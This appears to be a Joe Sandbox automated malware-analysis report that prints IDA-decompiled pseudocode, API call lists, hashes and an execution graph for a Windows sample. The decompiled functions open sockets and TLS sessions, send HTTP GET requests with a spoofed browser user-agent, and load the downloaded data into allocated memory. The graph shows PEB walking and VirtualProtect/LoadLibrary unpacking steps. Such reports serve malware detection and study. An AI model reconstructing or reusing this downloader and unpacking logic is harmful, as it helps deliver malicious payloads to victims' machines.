                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: File$CloseCreateErrorHandleLastPointerWrite
                        • String ID:
                        • API String ID: 170361235-0
                        • Opcode ID: ed6e4e1e1849b2234484429e952ad4fb7924ed1f5909b9f2c715645d0b514ea0
                        • Instruction ID: 1f6614cf9055a7bc591be3da9d938b2c9dc0f17c8a3350fe06385555e5e49346
                        • Opcode Fuzzy Hash: ed6e4e1e1849b2234484429e952ad4fb7924ed1f5909b9f2c715645d0b514ea0
                        • Instruction Fuzzy Hash: 7BF06871540209BADF215F99CD03FDE7A799F00718F214136F615B40E1DB769A31A75C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E00402BA7(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                        				char _v8;
                        				char _v16;
                        				char _v28;
                        				char _v1052;
                        				char _v1056;
                        				long _v1060;
                        				char _v1068;
                        				char _v1076;
                        				char _v1080;
                        				void* _t50;
                        				void* _t60;
                        				char* _t72;
                        				void* _t75;
                        				long _t82;
                        				char _t86;
                        				intOrPtr* _t87;
                        				void* _t88;
                        				void* _t90;
                        
                        				_t90 = __eflags;
                        				E00406259( &_v1080,  &_v16 - _t88);
                        				E00404681(_a16);
                        				_t50 = E00402D52(__edx, _t90, _a4, _a8,  &_v1068,  &_v1076,  &_v8);
                        				_t91 = _t50;
                        				if(_t50 != 0) {
                        					E00404224(_t91, _v8,  &_v1052, wsprintfA( &_v1052, "GET %s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\r\nConnection: close\r\n\r\n", _a12, _a4), 0,  &_v1068);
                        					while(1) {
                        						E0040621F(_v8, 0,  &_v28, 0xa, 0);
                        						_push( &_v16);
                        						_push(0);
                        						_push(0);
                        						_t72 =  &_v28;
                        						_push(_t72);
                        						_push(0);
                        						L00406A24();
                        						_t92 = _t72;
                        						if(_t72 <= 0) {
                        							goto L5;
                        						}
                        						_t75 = E00404359(_t92, _v8,  &_v1080,  &_v1068);
                        						if(_t75 > 0) {
                        							_v1060 = _v1060 + _t75;
                        							E004045E2( &_v1056, _v1060, _v1080, _t75);
                        							E00404681( &_v1080);
                        							continue;
                        						}
                        						goto L5;
                        					}
                        				}
                        				L5:
                        				E00405FFB( &_v1068,  &_v1076, _v8);
                        				__eflags = _v1060;
                        				if(_v1060 == 0) {
                        					L13:
                        					E00404681( &_v1056);
                        					_v1060 = 0;
                        				} else {
                        					_t87 = _v1056;
                        					_t82 = _v1060;
                        					while(1) {
                        						__eflags = _t82 - 4;
                        						if(_t82 < 4) {
                        							goto L13;
                        						}
                        						__eflags =  *_t87 - 0xa0d0a0d;
                        						if( *_t87 != 0xa0d0a0d) {
                        							L11:
                        							_t87 = _t87 + 1;
                        							_t82 = _t82 - 1;
                        							__eflags = _t82;
                        							continue;
                        						} else {
                        							_t82 = _t82 - 4;
                        							_t87 = _t87 + 4;
                        							__eflags = _t82;
                        							if(_t82 <= 0) {
                        								goto L11;
                        							} else {
                        								_v1060 = _t82;
                        								_t60 = VirtualAlloc(0, _v1060, 0x3000, 4);
                        								__eflags = _t60;
                        								if(_t60 == 0) {
                        									goto L13;
                        								} else {
                        									_t86 = _t60;
                        									E004061D2(_t87, _t86, _v1060);
                        									E00404681( &_v1056);
                        									_v1056 = _t86;
                        								}
                        							}
                        						}
                        						goto L14;
                        					}
                        					goto L13;
                        				}
                        				L14:
                        				E004061D2( &_v1056, _a16, 4);
                        				return _v1060;
                        			}





















                        0x00402ba7
                        0x00402bbe
                        0x00402bc6
                        0x00402be3
                        0x00402be8
                        0x00402bea
                        0x00402c20
                        0x00402c25
                        0x00402c32
                        0x00402c3a
                        0x00402c3b
                        0x00402c3d
                        0x00402c3f
                        0x00402c42
                        0x00402c43
                        0x00402c45
                        0x00402c4a
                        0x00402c4c
                        0x00000000
                        0x00000000
                        0x00402c5f
                        0x00402c66
                        0x00402c6e
                        0x00402c83
                        0x00402c8f
                        0x00000000
                        0x00402c8f
                        0x00000000
                        0x00402c66
                        0x00402c25
                        0x00402c96
                        0x00402ca7
                        0x00402cac
                        0x00402cb3
                        0x00402d1e
                        0x00402d25
                        0x00402d2a
                        0x00402cb5
                        0x00402cb5
                        0x00402cbb
                        0x00402d19
                        0x00402d19
                        0x00402d1c
                        0x00000000
                        0x00000000
                        0x00402cc3
                        0x00402cc9
                        0x00402d17
                        0x00402d17
                        0x00402d18
                        0x00402d18
                        0x00000000
                        0x00402ccb
                        0x00402ccb
                        0x00402cce
                        0x00402cd1
                        0x00402cd4
                        0x00000000
                        0x00402cd6
                        0x00402cd6
                        0x00402cf0
                        0x00402cf0
                        0x00402cf2
                        0x00000000
                        0x00402cf4
                        0x00402cf4
                        0x00402cfe
                        0x00402d0a
                        0x00402d0f
                        0x00402d0f
                        0x00402cf2
                        0x00402cd4
                        0x00000000
                        0x00402cc9
                        0x00000000
                        0x00402d19
                        0x00402d34
                        0x00402d40
                        0x00402d4f

                        APIs
                          • Part of subcall function 00404681: VirtualFree.KERNEL32(?,00000000,00008000,?,?,000000C7,?,00405389,?,?,?,?,?,?,00000000,00000006), ref: 00404698
                          • Part of subcall function 00402D52: AcquireCredentialsHandleA.SECUR32(00000000,Microsoft Unified Security Protocol Provider,00000002,00000000,?,00000000,00000000,?,00000000,?,00000008,?,00000008,?,?,00408566), ref: 00402DA8
                          • Part of subcall function 00402D52: InitializeSecurityContextA.SECUR32(?,00000000,?,?,00000000,00000010,00000000,00000000,?,?,?,00000000,?,?,00000004,?), ref: 00402E2F
                          • Part of subcall function 00402D52: FreeContextBuffer.SECUR32(?,?,?,?,00000000,?,00000000,?,?,00000000,00000010,00000000,00000000,?,?,?), ref: 00402E5B
                          • Part of subcall function 00402D52: VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004,?,?,?,?,00000000,?,00000000,?,?,00000000,00000010,00000000), ref: 00402E6E
                        • wsprintfA.USER32 ref: 00402C02
                        • select.WSOCK32(00000000,?,00000000,00000000,?,?,00000000,?,0000000A,00000000,?,?,00000000,00000000,?), ref: 00402C45
                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402CEB
                          • Part of subcall function 00404359: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,00000004,?,?,?,?,00000003), ref: 00404392
                          • Part of subcall function 00404359: DecryptMessage.SECUR32(?,?,00000000,00000000,?,?,00000004,?,?,00000004,?,?,?,00000000,00000000,?), ref: 0040447B
                        Strings
                        • GET %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close, xrefs: 00402BF6
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: Virtual$Alloc$ContextFree$AcquireBufferCredentialsDecryptHandleInitializeMessageSecurityselectwsprintf
                        • String ID: GET %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
                        • API String ID: 3270067178-3041754183
                        • Opcode ID: 2828a38bb38c6b1a470c76924da7ec9ed622c16335ac7d6f96ddf4cad91fea56
                        • Instruction ID: ea3e87377c713c2e9a9400357f34f7aa124d835e45dc53f7a9d5bf21af3c192a
                        • Opcode Fuzzy Hash: 2828a38bb38c6b1a470c76924da7ec9ed622c16335ac7d6f96ddf4cad91fea56
                        • Instruction Fuzzy Hash: DE412DF2A0011CAADF21AA91CD45FEE77BCAF44304F5044BAB705B60D1E7789F958B68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateWindowExA.USER32(00000080,?,?,00C80000,00000FA0,00000FA0,000001F4,00000096,00000000,00000000,?,00000000), ref: 00865EB8
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00865EDC
                        • TranslateMessage.USER32(?), ref: 00865EE5
                        • DispatchMessageA.USER32(?), ref: 00865EEE
                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$CreateDispatchTranslateWindow
                        • String ID:
                        • API String ID: 1603676695-0
                        • Opcode ID: c0988211585519f28889d20caa47f2a62cf186668c5d987b6ff5aa59d4caad1a
                        • Instruction ID: f357160bd0c35d90ef66b911bff188b1bf4eb29764e527b61b4d0862764f816e
                        • Opcode Fuzzy Hash: c0988211585519f28889d20caa47f2a62cf186668c5d987b6ff5aa59d4caad1a
                        • Instruction Fuzzy Hash: 6231EA70E50248BAEB50EFE8CC46FDDB6B8FB04B10F514065B608FA1C1EBB556148BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 73%
                        			E004046AE() {
                        				char _v402;
                        				intOrPtr _v412;
                        				char _v420;
                        				intOrPtr _v424;
                        				char _v436;
                        				char _v440;
                        				char* _t21;
                        				intOrPtr _t27;
                        				signed int _t31;
                        				void* _t33;
                        				void* _t34;
                        
                        				E00406259( &_v440, _t33 - _t34);
                        				goto L1;
                        				L3:
                        				L3:
                        				if(_v412 == 0) {
                        					_t38 = _v440;
                        					if(_v440 == 0) {
                        						L00406AA2();
                        						_v440 = _t27;
                        					}
                        				}
                        				_t27 = E00404BE5(_t31, _t38, _v412, _v424);
                        				if(_t27 != 0) {
                        					goto L14;
                        				}
                        				while(_v412 != 0) {
                        					__eflags = _v412 - 0x408010;
                        					if(__eflags == 0) {
                        						_v412 = 0x408042;
                        						L13:
                        						goto L3;
                        					}
                        					_v412 = 0;
                        					_t27 = 0;
                        					__eflags = 0;
                        					asm("repe scasb");
                        					if(0 == 0) {
                        						continue;
                        					}
                        					goto L13;
                        				}
                        				_v412 = 0x408010;
                        				goto L13;
                        				L14:
                        				Sleep(0x2bf20);
                        				goto L3;
                        				L1:
                        				Sleep(0x2710);
                        				_t21 =  &_v402;
                        				_push(_t21);
                        				_push(0x202);
                        				L004069F4();
                        				if(_t21 != 0) {
                        					goto L1;
                        				} else {
                        					_v412 = 0x408010;
                        					E00406270(0x408074, 0xffffffff,  &_v420);
                        					_v424 = E004061EA( &_v420);
                        					_t27 = E00406270(0x40807e, 0xa,  &_v436);
                        					goto L3;
                        				}
                        			}














                        0x004046c2
                        0x004046c2
                        0x00000000
                        0x00404728
                        0x0040472f
                        0x00404731
                        0x00404738
                        0x0040473a
                        0x0040473f
                        0x0040473f
                        0x00404738
                        0x00404751
                        0x00404758
                        0x00000000
                        0x00000000
                        0x0040475a
                        0x0040476f
                        0x00404779
                        0x00404798
                        0x004047a2
                        0x00000000
                        0x004047a2
                        0x0040477b
                        0x0040478b
                        0x0040478b
                        0x00404792
                        0x00404794
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404796
                        0x00404763
                        0x00000000
                        0x004047a4
                        0x004047a9
                        0x00000000
                        0x004046c7
                        0x004046cc
                        0x004046d1
                        0x004046d7
                        0x004046d8
                        0x004046dd
                        0x004046e4
                        0x00000000
                        0x004046e6
                        0x004046e6
                        0x004046fe
                        0x0040470f
                        0x00404723
                        0x00000000
                        0x00404723

                        APIs
                        • Sleep.KERNEL32(00002710,?), ref: 004046CC
                        • WSAStartup.WSOCK32(00000202,?,00002710,?), ref: 004046DD
                        • InitSecurityInterfaceA.SECUR32(0002BF20,?,?,0040807E,0000000A,?,?,00408074,000000FF,?,00000202,?,00002710,?), ref: 0040473A
                        • Sleep.KERNEL32(0002BF20,?,?,0040807E,0000000A,?,?,00408074,000000FF,?,00000202,?,00002710,?), ref: 004047A9
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: Sleep$InitInterfaceSecurityStartup
                        • String ID:
                        • API String ID: 3734495323-0
                        • Opcode ID: 6bfff6133595982a0b0d7c63d336999db48d5bc1cbf1d16ee10045db65cb5e2f
                        • Instruction ID: 32668a4f7727aee79309d565fee0f0efc37fcb71324598338343f478b02e6bf0
                        • Opcode Fuzzy Hash: 6bfff6133595982a0b0d7c63d336999db48d5bc1cbf1d16ee10045db65cb5e2f
                        • Instruction Fuzzy Hash: 8B219CB09002189ADF60AB51CD46BE972B8AF86304F1101FFA749761C1DB7C4AD4CF1A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 62%
                        			E00405E81(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
                        				char _v8;
                        				char _v28;
                        				char* _t20;
                        				intOrPtr _t24;
                        
                        				_v8 = 0xa;
                        				if(_a16 != 0) {
                        					WaitForSingleObject(_a16, 0xffffffff);
                        				}
                        				_t24 = _a8;
                        				while(_a12 != 0) {
                        					E0040621F(_a4, 0,  &_v28, 0, 0);
                        					_push(0);
                        					_push(0);
                        					_t20 =  &_v28;
                        					_push(_t20);
                        					_push(0);
                        					_push(0);
                        					L00406A24();
                        					if(_t20 == 1) {
                        						_push(0);
                        						_push(_a12);
                        						_push(_t24);
                        						_push(_a4);
                        						L00406A2A();
                        						if(_t20 > 0) {
                        							_a12 = _a12 - _t20;
                        							_t24 = _t24 + _t20;
                        							_t12 =  &_v8;
                        							 *_t12 = _v8 - 1;
                        							if( *_t12 != 0) {
                        								continue;
                        							}
                        						}
                        					}
                        					break;
                        				}
                        				if(_a16 != 0) {
                        					SetEvent(_a16);
                        				}
                        				return _a12;
                        			}







                        0x00405e8a
                        0x00405e95
                        0x00405e9c
                        0x00405e9c
                        0x00405ea1
                        0x00405eea
                        0x00405eb3
                        0x00405eb8
                        0x00405eba
                        0x00405ebc
                        0x00405ebf
                        0x00405ec0
                        0x00405ec2
                        0x00405ec4
                        0x00405ecc
                        0x00405ece
                        0x00405ed0
                        0x00405ed3
                        0x00405ed4
                        0x00405ed7
                        0x00405ede
                        0x00405ee0
                        0x00405ee3
                        0x00405ee5
                        0x00405ee5
                        0x00405ee8
                        0x00000000
                        0x00000000
                        0x00405ee8
                        0x00405ede
                        0x00000000
                        0x00405ecc
                        0x00405ef4
                        0x00405ef9
                        0x00405ef9
                        0x00405f05

                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 00405E9C
                        • select.WSOCK32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?), ref: 00405EC4
                        • send.WSOCK32(?,?,?,00000000,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?), ref: 00405ED7
                        • SetEvent.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?), ref: 00405EF9
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: EventObjectSingleWaitselectsend
                        • String ID:
                        • API String ID: 3746265427-0
                        • Opcode ID: 113ec2eb669758f4957e401fc0df4c31e6288e18a9b311591d8add46774f9e54
                        • Instruction ID: 2396f94303c78b994c04533d99ebd8cf1fb94f9d4c8c1189a4efc987da97af84
                        • Opcode Fuzzy Hash: 113ec2eb669758f4957e401fc0df4c31e6288e18a9b311591d8add46774f9e54
                        • Instruction Fuzzy Hash: 0811613164020ABBEF20AF55CD06FEF36A8EB01715F100137BA51B51D1CBB9AA60DBD9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E00402A45(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                        				char _v8;
                        				char _v16;
                        				char _v1072;
                        				char _v1076;
                        				char _v1080;
                        				char _v1084;
                        				void* _t58;
                        				void* _t59;
                        				void* _t61;
                        
                        				_t61 = __eflags;
                        				E00406259( &_v1084,  &_v16 - _t59);
                        				E00404681(_a16);
                        				if(E004027BB(__edx, _t61,  &_v8, _a4, _a8, 0xa) != 0) {
                        					_t40 = E00405E81(_v8,  &_v1072, wsprintfA( &_v1072, "GET %s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\r\nConnection: close\r\n\r\n", _a12, _a4), 0);
                        					_t58 = 0;
                        					while(_t58 <= 0x400) {
                        						_t13 =  &_v1072; // -1068
                        						_t40 = E00405F54(__eflags, _v8, _t58 + _t13, 1, 0xa);
                        						__eflags = _t40 - 1;
                        						if(_t40 == 1) {
                        							_t58 = _t58 + 1;
                        							__eflags = _t58 - 4;
                        							if(__eflags < 0) {
                        								continue;
                        							} else {
                        								__eflags =  *[ss:edi+ebp-0x430] - 0xa0d0a0d;
                        								if(__eflags != 0) {
                        									continue;
                        								} else {
                        									while(1) {
                        										_push( &_v1076);
                        										_push(0x4004667f);
                        										_push(_v8);
                        										L00406A18();
                        										__eflags = _v1076;
                        										if(_v1076 == 0) {
                        											_v1076 = 0x1000;
                        										}
                        										_t40 = E00404618( &_v1080, _v1084, _v1076 + _v1084);
                        										__eflags = _t40;
                        										if(_t40 == 0) {
                        											goto L14;
                        										}
                        										while(1) {
                        											__eflags = _v1076;
                        											if(__eflags == 0) {
                        												break;
                        											}
                        											_t40 = E00405F54(__eflags, _v8, _v1080 + _v1084, _v1076, 0xa);
                        											__eflags = _t40;
                        											if(_t40 > 0) {
                        												_v1084 = _v1084 + _t40;
                        												_t29 =  &_v1076;
                        												 *_t29 = _v1076 - _t40;
                        												__eflags =  *_t29;
                        												continue;
                        											}
                        											goto L14;
                        										}
                        									}
                        								}
                        							}
                        						}
                        						goto L14;
                        					}
                        				}
                        				L14:
                        				E0040603E(_t40, _v8);
                        				E004061D2( &_v1080, _a16, 4);
                        				return _v1084;
                        			}












                        0x00402a45
                        0x00402a5c
                        0x00402a64
                        0x00402a7c
                        0x00402aa9
                        0x00402aae
                        0x00402b75
                        0x00402ab9
                        0x00402ac4
                        0x00402ac9
                        0x00402acc
                        0x00402ad2
                        0x00402ad3
                        0x00402ad6
                        0x00000000
                        0x00402adc
                        0x00402adc
                        0x00402ae8
                        0x00000000
                        0x00000000
                        0x00402aee
                        0x00402af4
                        0x00402af5
                        0x00402afa
                        0x00402afd
                        0x00402b02
                        0x00402b09
                        0x00402b0b
                        0x00402b0b
                        0x00402b2f
                        0x00402b34
                        0x00402b36
                        0x00000000
                        0x00000000
                        0x00402b67
                        0x00402b67
                        0x00402b6e
                        0x00000000
                        0x00000000
                        0x00402b52
                        0x00402b57
                        0x00402b59
                        0x00402b5b
                        0x00402b61
                        0x00402b61
                        0x00402b61
                        0x00000000
                        0x00402b61
                        0x00000000
                        0x00402b59
                        0x00402b70
                        0x00402aee
                        0x00402ae8
                        0x00402ad6
                        0x00000000
                        0x00402acc
                        0x00402b75
                        0x00402b81
                        0x00402b84
                        0x00402b95
                        0x00402ba4

                        APIs
                          • Part of subcall function 00404681: VirtualFree.KERNEL32(?,00000000,00008000,?,?,000000C7,?,00405389,?,?,?,?,?,?,00000000,00000006), ref: 00404698
                          • Part of subcall function 004027BB: socket.WSOCK32(00000002,00000001,00000006,?,?,?,?,00000003), ref: 004027DD
                          • Part of subcall function 004027BB: setsockopt.WSOCK32(?,00000006,00000001,?,00000004,?,?,00000004,00000002,00000001,00000006,?,?,?,?,00000003), ref: 0040280D
                          • Part of subcall function 004027BB: inet_addr.WSOCK32(00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?,00000004,?,?,00000004), ref: 00402850
                          • Part of subcall function 004027BB: htons.WSOCK32(?,00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?,00000004,?,?), ref: 00402871
                          • Part of subcall function 004027BB: ioctlsocket.WSOCK32(?,8004667E,?,?,00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?), ref: 00402899
                          • Part of subcall function 004027BB: connect.WSOCK32(?,?,00000010,?,8004667E,?,?,00000000,00000000,?,00000002,?,?,000000FF,?,?), ref: 004028A7
                          • Part of subcall function 004027BB: select.WSOCK32(00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010,?,8004667E,?), ref: 004028CD
                          • Part of subcall function 004027BB: ioctlsocket.WSOCK32(?,8004667E,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010), ref: 004028F0
                        • wsprintfA.USER32 ref: 00402A94
                          • Part of subcall function 00405E81: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 00405E9C
                          • Part of subcall function 00405E81: SetEvent.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?), ref: 00405EF9
                        • ioctlsocket.WSOCK32(?,4004667F,?), ref: 00402AFD
                        Strings
                        • GET %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close, xrefs: 00402A88
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: ioctlsocket$EventFreeObjectSingleVirtualWaitconnecthtonsinet_addrselectsetsockoptsocketwsprintf
                        • String ID: GET %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
                        • API String ID: 2667627932-3041754183
                        • Opcode ID: 0b94c95cbee72e6236bd4e11aeb75fad0f975269c25ce6b7bd6ce0e1376529db
                        • Instruction ID: 511fe9c704641e92f19ff8053734ebdddd3d1194ed401c1cce5eb170f25c8087
                        • Opcode Fuzzy Hash: 0b94c95cbee72e6236bd4e11aeb75fad0f975269c25ce6b7bd6ce0e1376529db
                        • Instruction Fuzzy Hash: FC3161B1D00219AADF21AE64CD46FDE7378AB44318F4011BABA09B20D1D7799B94DF1D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E00405FFB(intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12) {
                        				void* _t7;
                        				intOrPtr* _t9;
                        				intOrPtr* _t10;
                        
                        				_t10 = _a4;
                        				if( *_t10 != 0 ||  *((intOrPtr*)(_t10 + 4)) != 0) {
                        					_push(_t10);
                        					L00406A7E();
                        				}
                        				_t9 = _a8;
                        				if( *_t9 != 0 ||  *((intOrPtr*)(_t9 + 4)) != 0) {
                        					_push(_t9);
                        					L00406A90();
                        				}
                        				if(_a12 != 0) {
                        					return E0040603E(_t7, _a12);
                        				}
                        				return _t7;
                        			}






                        0x00406001
                        0x00406007
                        0x0040600f
                        0x00406010
                        0x00406010
                        0x00406015
                        0x0040601b
                        0x00406023
                        0x00406024
                        0x00406024
                        0x0040602d
                        0x00000000
                        0x00406032
                        0x0040603b

                        APIs
                        • DeleteSecurityContext.SECUR32(?,?,llfujo,00000003,?,0040534D,?,?,?,?,00000000,00000006,?,00000000,00000002,00000000), ref: 00406010
                        • FreeCredentialsHandle.SECUR32(?,?,?,llfujo,00000003,?,0040534D,?,?,?,?,00000000,00000006,?,00000000,00000002), ref: 00406024
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: ContextCredentialsDeleteFreeHandleSecurity
                        • String ID: llfujo
                        • API String ID: 4037185482-2623408462
                        • Opcode ID: f9cdc18efc00309c2387021243cc9d8d8b1836885ddc4571b5c1678377b19811
                        • Instruction ID: 8408628c45a78c38b20e8401183cbb7796a99266342e33a0c94a3183ed2c343b
                        • Opcode Fuzzy Hash: f9cdc18efc00309c2387021243cc9d8d8b1836885ddc4571b5c1678377b19811
                        • Instruction Fuzzy Hash: D8F06531140216EBDB35AE09C804B9B77A8EF81399F12803FE412361D193BC9CF0CA99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ExitProcess.KERNEL32(00000000,0000EA60,0040811D,00002710,0040593C,00000000,00002710,0040593C,00000000), ref: 00866ADD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: J$llfujo
                        • API String ID: 621844428-3406935086
                        • Opcode ID: 3e4acc038e22f6ff0e1a9397e63c14ed0e905d77c03657d31d28e17e2454a0a4
                        • Instruction ID: 06057c36ad5daae6d8417a82042c23236f8e6b396d5c8bd5df8c587589e91d6a
                        • Opcode Fuzzy Hash: 3e4acc038e22f6ff0e1a9397e63c14ed0e905d77c03657d31d28e17e2454a0a4
                        • Instruction Fuzzy Hash: E1E0DF3210828DFACF012FC8AC02A9E3F24FB447A2F028032F600A80925A318431AB73
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:4.6%
                        Dynamic/Decrypted Code Coverage:98.3%
                        Signature Coverage:0%
                        Total number of Nodes:473
                        Total number of Limit Nodes:1
                        execution_graph 2921 40f7a0 2922 40f7c0 2921->2922 2925 40f550 2922->2925 2924 40f848 2926 40f573 GlobalAlloc 2925->2926 2929 40f748 2926->2929 2931 40d980 VirtualProtect 2929->2931 2930 40f76d 2930->2924 2931->2930 2954 860005 2959 86092b GetPEB 2954->2959 2956 860030 2961 86003c 2956->2961 2960 860972 2959->2960 2960->2956 2962 860049 2961->2962 2963 860df8 2 API calls 2962->2963 2964 860223 2963->2964 2965 860d90 GetPEB 2964->2965 2966 860238 VirtualAlloc 2965->2966 2967 860265 2966->2967 2968 8602ce VirtualProtect 2967->2968 2970 86030b 2968->2970 2969 860439 VirtualFree 2974 8605f4 LoadLibraryA 2969->2974 2975 8604be 2969->2975 2970->2969 2971 8604e3 LoadLibraryA 2971->2975 2973 8608c7 2974->2973 2975->2971 2975->2974 2976 864443 2979 8642bd 2976->2979 2977 8642cf select 2977->2979 2980 864394 2977->2980 2979->2977 2979->2980 2983 86433b 2979->2983 2985 8645a9 2979->2985 2993 864832 2979->2993 2983->2980 2984 866158 6 API calls 2983->2984 2996 8638e7 2983->2996 2984->2983 2986 8645c2 2985->2986 2987 8645cc VirtualAlloc 2986->2987 2990 8645ef 2987->2990 2991 8646f2 2987->2991 2990->2991 2992 864832 VirtualAlloc 2990->2992 3005 864868 VirtualAlloc 2990->3005 3007 8661a4 2990->3007 2991->2979 2992->2990 2994 864868 VirtualAlloc 2993->2994 2995 86484a 2994->2995 2995->2979 3011 8637a4 2996->3011 2999 8637a4 GetPEB 3001 863919 2999->3001 3000 863936 3016 86331a 3000->3016 3001->3000 3002 8637a4 GetPEB 3001->3002 3002->3000 3004 863968 3004->2983 3006 864888 3005->3006 3006->2990 3008 8661c0 3007->3008 3009 8661cb select 3008->3009 3010 8661e0 3009->3010 3010->2990 3015 8637bd 3011->3015 3012 86385f 3012->2999 3015->3012 3036 8668e8 3015->3036 3040 8669d8 3015->3040 3017 863329 3016->3017 3023 86334f 3016->3023 3018 8668e8 GetPEB 3017->3018 3019 863344 3018->3019 3021 8669d8 GetPEB 3019->3021 3020 863388 3026 8668e8 GetPEB 3020->3026 3035 8633b2 3020->3035 3021->3023 3022 8668e8 GetPEB 3025 86337d 3022->3025 3023->3020 3023->3022 3024 8633ef 3029 863404 3024->3029 3046 8662ee 3024->3046 3028 8669d8 GetPEB 3025->3028 3030 8633a7 3026->3030 3027 8668e8 GetPEB 3031 8633e4 3027->3031 3028->3020 3029->3004 3033 8669d8 GetPEB 3030->3033 3034 8669d8 GetPEB 3031->3034 3033->3035 3034->3024 3035->3024 3035->3027 3037 866904 3036->3037 3038 866915 GetPEB 3037->3038 3039 86692a 3038->3039 3039->3015 3042 8669f4 3040->3042 3041 866aca 3041->3015 3042->3041 3043 8668e8 GetPEB 3042->3043 3044 866ac3 3043->3044 3045 8669d8 GetPEB 3044->3045 3045->3041 3050 8662f9 3046->3050 3047 866328 3047->3029 3048 8668e8 GetPEB 3048->3050 3049 8669d8 GetPEB 3049->3050 3050->3047 3050->3048 3050->3049 3051 860001 3052 860005 3051->3052 3053 86092b GetPEB 3052->3053 3054 860030 3053->3054 3055 86003c 8 API calls 3054->3055 3056 860038 3055->3056 3057 865b8c 3058 865ba8 3057->3058 3059 865cbc Sleep 3058->3059 3060 865cd2 3058->3060 3059->3060 3061 864d6d 3066 864d19 3061->3066 3062 864d33 select 3062->3066 3063 864d6b 3064 866158 6 API calls 3063->3064 3065 864e16 3064->3065 3066->3062 3066->3063 3068 